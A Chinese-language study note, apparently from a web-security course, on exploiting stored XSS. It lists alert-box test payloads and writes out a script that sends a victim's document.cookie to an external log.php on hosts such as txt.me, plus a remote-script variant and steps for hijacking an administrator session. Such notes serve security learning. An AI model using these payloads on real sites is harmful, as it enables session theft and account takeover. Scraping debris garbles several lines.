11/28~11/30 学习内容 高烧2天ing

 

上一节课,咱们经过SQL注入获取目标数据库中的数据,再经过获取账户密码,进行爆破、后台路径成功地登陆进入后台,再经过后台的文件上传漏洞,成功地获取网站的webshell,也就是获取了目标网站的权限。php

 

今天咱们讲XSSweb

 

 

XSS利用方式   攻击客户端  窃取用户信息   管理员shell

                                                                     普通用户数据库

 

SQL注入利用数据   提权  写文件提权cookie

 

 

XSS经常使用的几个payloaddom

<img/src=x>xss

<svg/onload=alert(1)>svg

<script>alert(1)<script>测试

第一种加载图片,后两种弹窗网站

<!--   注释的方式,容易形成页面混乱

 

 

好比像测试的一个网站,有个用户注册,咱们经过修改信息达到弹窗的目的。而管理员只有在后台点开会员信息时,才会弹窗

这就是XSS盲打,因此说失败率仍是挺高的,可是事情咱们仍是要去作

 

当我把咱们的cookie改为管理员的cookie时,就至关于咱们有管理员的权限了。

可使用Editthiscookie

 

 

payload:new image().src ="http://domain.com/log.php?c=" + encodeURL(document.cookie);

 

 JS的一个语法

document.cookie的内容以下

 

 

 

此时咱们加上标签    <script>new image().src ="http:/txt.me/log.php?c=" + encodeURL(document.cookie);</script>

 

 http:/txt.me/log.php?c=

咱们这个域名下有个log.php的目录,后面有个参数c,假如咱们随便输入一段内容,c=23333

 

 

那么这段内容会被存储到cookie.txt中

 

 

 

 

当咱们插入xss的payload时,发现有字符串限制时怎么办呢

利用src  外部的Js脚本属性    <script src=//txt.me/1.js></script>

1.js就是咱们上面字符串的内容

 

 

插入后,咱们能够查看一下有没有成功

 

 

咱们刚才进入了两次,成功记录了2次

 

 咱们能够对比一下是否是咱们的cookie   查看Headers

 

 

 当管理员在后台点击会员管理时,就会触发

而后咱们得到管理员cookie后,开始替换

 

 

 

 

 

 成功替换,刷新一下页面,此时咱们就是管理员页面了

 

 end

 

XSS平台的使用

未完待续

相关文章
相关标签/搜索